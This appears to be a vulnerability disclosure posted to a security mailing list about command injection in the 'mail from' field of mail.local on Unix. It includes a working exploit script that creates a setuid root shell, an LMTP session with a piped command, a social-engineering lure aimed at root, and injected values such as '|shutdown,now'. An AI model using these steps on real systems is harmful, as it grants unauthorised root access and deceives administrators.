hi,



mail.local is a little setuid root prog designed, like its name suggest, for

local mail delivering.

Used with the -l option, we have an interactive mode in lmtp protocol (

simplified smtp for local mail delivery only )

A weakness exists in the 'mail from' field that allow any local user to

insert a piped shell command that may be executed

by the recipient when he does a reply with the  mail command. A little

social engineering skill should help to root the boxe.

Finally, mail.local shouldn't allow such escape chars even in the mail from

field and the command mail shouldn't allow such

a reply through a pipe.



A space char in the command will finish the string, so either u use a single

command like '|reboot' or use a comma that should

be converted in space by mail.

eg: '|shutdown,now'



Linux 2.4.0 beta Caldera that was freely distributed during the defcon 00 is

vulnerable to this pb.



That looks like the old sendmail bugs



nostalgia

=======



#cat exploit



#!/bin/sh

cp /bin/sh /tmp/newsh

chmod a+rws /tmp/newsh



#id

#id=666(c3rb3r) gid=100(user)

#

#cp exploit /tmp/@hotmail.com

#chmod a+x /tmp/@hotmail.com

#mail.local -l



....



mail from:<|/tmp/@hotmail.com>      U can use many senders to hide the evil

string

rcpt to:

data

Subject:I have a problem



I need higher priviledge on this machine, can u do something for me please ?

thanx.

c3rb3r



.

quit

.....



(now wait for a reply and then, )



#ls /tmp

@hotmail.com

newsh



#/tmp/newsh

#id

#id=0(root) gid=0(root)

#echo 'very nice, thanx a lot'  | mail -s 'thanx' root    // With

thankfully





Have a nice day,





Gregory Duchemin

Security consultant



1001 bd Maisonneuve Ouest, suite 200

Montreal (Quebec) H3A 3C8 CANADA

c3rb3r@hotmail.com



_________________________________________________________________________

Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.



Share information about yourself, create your own public profile at

http://profiles.msn.com.